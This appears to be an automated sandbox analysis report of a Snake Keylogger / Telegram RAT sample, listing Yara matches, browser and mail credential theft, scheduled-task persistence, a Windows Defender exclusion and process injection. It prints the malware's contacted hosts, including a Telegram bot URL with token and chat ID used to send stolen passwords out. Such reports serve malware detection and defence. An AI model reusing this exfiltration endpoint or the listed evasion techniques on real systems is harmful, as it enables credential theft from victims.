Source: Yara match File source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3693041192.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3693243826.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: EDyxAgkldisLe.exe PID: 7276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: EDyxAgkldisLe.exe PID: 8004, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: EDyxAgkldisLe.exe PID: 8004, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\rPO0977-6745.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\rPO0977-6745.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Yara detected Credential Stealer
Source: Yara match File source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: EDyxAgkldisLe.exe PID: 7276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: EDyxAgkldisLe.exe PID: 8004, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rPO0977-6745.exe.41f9670.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rPO0977-6745.exe.421a090.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.EDyxAgkldisLe.exe.3a7de48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rPO0977-6745.exe.421a090.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.rPO0977-6745.exe.41f9670.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.EDyxAgkldisLe.exe.3a5d428.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.3693041192.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3693243826.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3686100091.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3693243826.00000000030ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3693041192.00000000029EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1265815072.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1307021274.0000000003A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3693041192.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3693243826.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: EDyxAgkldisLe.exe PID: 7276, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: EDyxAgkldisLe.exe PID: 8004, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rPO0977-6745.exe PID: 2916, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: EDyxAgkldisLe.exe PID: 8004, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1480082 Sample: rPO0977-6745.exe Startdate: 24/07/2024 Architecture: WINDOWS Score: 100 46 reallyfreegeoip.org 2->46 48 api.telegram.org 2->48 50 3 other IPs or domains 2->50 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Sigma detected: Scheduled temp file as task from temp location 2->62 68 10 other signatures 2->68 8 rPO0977-6745.exe 7 2->8         started        12 EDyxAgkldisLe.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 46->64 66 Uses the Telegram API (likely for C&C communication) 48->66 process4 file5 38 C:\Users\user\AppData\...DyxAgkldisLe.exe, PE32 8->38 dropped 40 C:\...DyxAgkldisLe.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp44AD.tmp, XML 8->42 dropped 44 C:\Users\user\...\rPO0977-6745.exe.log, ASCII 8->44 dropped 70 Uses schtasks.exe or at.exe to add and modify task schedules 8->70 72 Adds a directory exclusion to Windows Defender 8->72 74 Injects a PE file into a foreign processes 8->74 14 rPO0977-6745.exe 15 2 8->14         started        18 powershell.exe 22 8->18         started        20 powershell.exe 23 8->20         started        26 2 other processes 8->26 76 Multi AV Scanner detection for dropped file 12->76 78 Machine Learning detection for dropped file 12->78 22 EDyxAgkldisLe.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 52 api.telegram.org 149.154.167.220, 443, 49735, 49741 TELEGRAMRU United Kingdom 14->52 54 reallyfreegeoip.org 188.114.97.3, 443, 49704, 49705 CLOUDFLARENETUS European Union 14->54 56 checkip.dyndns.com 158.101.44.242, 49702, 49706, 49709 ORACLE-BMC-31898US United States 14->56 80 Loading BitLocker PowerShell Module 18->80 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        82 Tries to steal Mail credentials (via file / registry access) 22->82 84 Tries to harvest and steal browser information (history, passwords, etc) 22->84 34 conhost.exe 24->34         started        36 conhost.exe 26->36         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
188.114.97.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
158.101.44.242
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false

Contacted Domains

Name IP Active
reallyfreegeoip.org 188.114.97.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 158.101.44.242 true
15.164.165.52.in-addr.arpa unknown unknown
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot6724182006:AAFoGlHe55KNUX6Demve5eHbGqhBzYsvQQc/sendDocument?chat_id=5535403842&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake false
  • Avira URL Cloud: safe
 unknown
http://checkip.dyndns.org/ false
  • URL Reputation: safe
 unknown
https://reallyfreegeoip.org/xml/8.46.123.33 false
  • URL Reputation: safe
 unknown